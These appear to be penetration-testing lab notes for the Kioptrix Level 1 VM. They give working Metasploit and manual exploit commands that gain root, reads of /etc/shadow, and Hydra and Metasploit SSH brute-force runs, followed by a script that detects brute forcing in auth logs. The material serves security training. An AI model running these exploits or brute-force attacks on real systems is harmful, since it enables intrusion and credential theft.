Exploitation Basics

  • Shell - gives access to a machine.

  • Reverse shell - the target machine connects back to us while we listen for it; commonly used.

  • Bind shell - we open a port on the target machine and then connect to it.

  • Payloads - code run as part of an exploit; sent to the victim to get shell access.

  • Non-staged payload - sends the exploit shellcode all at once; larger; does not always work. For example, windows/meterpreter_reverse_tcp.

  • Staged payload - sends the payload in stages; less stable. For example, windows/meterpreter/reverse_tcp.

  • Gaining root with Metasploit:

```
msfconsole

search trans2open   # name of the exploit for Samba
use 1               # use exploit/linux/samba/trans2open
options
set RHOSTS 10.0.2.4
show targets        # only one (selected) option, Samba 2.2.x
exploit
# does not work due to the default payload (staged), so we stop the process and change our payload to a non-staged one

set payload linux/x86/shell_reverse_tcp
# similar to the previous one, but non-staged
options
exploit
# this gives us shell access as root

whoami
# root
hostname
# kioptrix.level1
```

  • Gaining root with manual exploitation:

```
mkdir kioptrix
cd kioptrix/
git clone https://github.com/heltonWernik/OpenLuck.git   # exploit for mod_ssl
cd OpenLuck/
ls
apt install libssl-dev                  # install the libssl development package
gcc -o openluck OpenFuck.c -lcrypto     # compile the program
ls                                      # shows the openluck executable
./openluck                              # shows usage
# from enumeration, we know the target is running RedHat Linux and Apache 1.3.20, so we run the script with the matching arguments

./openluck 0x6b 10.0.2.4 -c 40
# runs the script
# now we have access

whoami
# root
cat /etc/passwd
# shows users
cat /etc/shadow
# shows hashed passwords
# both /etc/passwd and /etc/shadow can be combined to decipher the passwords
```

  • Brute force attack:

```
# using Hydra
hydra -l root -P /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt ssh://10.0.2.4 -t 4 -V
# we attack root with the unix_passwords.txt wordlist using 4 parallel tasks; -V is for verbose output
```

```
# using Metasploit
msfconsole
search ssh
use auxiliary/scanner/ssh/ssh_login
options
set username root
set pass_file /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt
set rhosts 10.0.2.4
set threads 5
set verbose true
exploit
```
  • Credential stuffing - injecting breached account credentials in the hope of an account takeover; we can do this using the Intruder window in Burp Suite.

  • Password spraying - brute-forcing logins using a list of usernames and common passwords; similar to credential stuffing.
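The brute-force, credential-stuffing and password-spraying entries above all show up on the target as a burst of failed logins from one source, so they are easy to spot in sshd's auth log. As an added example (not part of the original notes), the script below parses constructed auth.log lines for the kioptrix host, counts failures per source address and the usernames tried, and flags a source that crosses a threshold together with any login accepted from it afterwards; the source address 10.0.2.15, the user bob and all log lines are constructed.

```python
import re
from collections import defaultdict

# Constructed sshd auth.log lines (not real captures): root and the kioptrix host
# mirror the notes above; the source address 10.0.2.15 and user bob are made up.
SAMPLE_AUTH_LOG = """\
Mar  3 10:01:01 kioptrix sshd[1201]: Failed password for root from 10.0.2.15 port 40211 ssh2
Mar  3 10:01:02 kioptrix sshd[1202]: Failed password for root from 10.0.2.15 port 40212 ssh2
Mar  3 10:01:02 kioptrix sshd[1203]: Failed password for root from 10.0.2.15 port 40213 ssh2
Mar  3 10:01:03 kioptrix sshd[1204]: Failed password for invalid user admin from 10.0.2.15 port 40214 ssh2
Mar  3 10:01:04 kioptrix sshd[1205]: Failed password for root from 10.0.2.15 port 40215 ssh2
Mar  3 10:01:05 kioptrix sshd[1206]: Accepted password for root from 10.0.2.15 port 40216 ssh2
Mar  3 10:05:00 kioptrix sshd[1300]: Failed password for bob from 10.0.2.9 port 50000 ssh2
Mar  3 10:06:00 kioptrix sshd[1301]: Accepted publickey for bob from 10.0.2.9 port 50001 ssh2
"""

FAILED_RE = re.compile(
    r"sshd\[\d+\]: Failed password for (?:invalid user )?(\S+) from (\S+) port \d+")
ACCEPTED_RE = re.compile(
    r"sshd\[\d+\]: Accepted (\w+) for (\S+) from (\S+) port \d+")


def analyze_auth_log(lines, threshold=4):
    """One alert per source with >= threshold failed logins: failure count,
    usernames tried (many users with few attempts each suggests spraying, one
    user with many attempts a wordlist run) and logins accepted from that
    source after it crossed the threshold (the likely takeover)."""
    failures = defaultdict(int)             # source ip -> failed attempts so far
    users_tried = defaultdict(set)          # source ip -> usernames seen in failures
    suspicious_success = defaultdict(list)  # source ip -> [(user, auth method)]
    for line in lines:
        m = FAILED_RE.search(line)
        if m:
            user, src = m.groups()
            failures[src] += 1
            users_tried[src].add(user)
            continue
        m = ACCEPTED_RE.search(line)
        if m:
            method, user, src = m.groups()
            if failures.get(src, 0) >= threshold:
                suspicious_success[src].append((user, method))
    return [
        {"src": src, "failures": count, "users": sorted(users_tried[src]),
         "suspicious_success": suspicious_success[src]}
        for src, count in failures.items() if count >= threshold
    ]
```

Run it against a real `/var/log/auth.log` with `analyze_auth_log(open(path))`; a flagged source with a non-empty `suspicious_success` list is the case to investigate first.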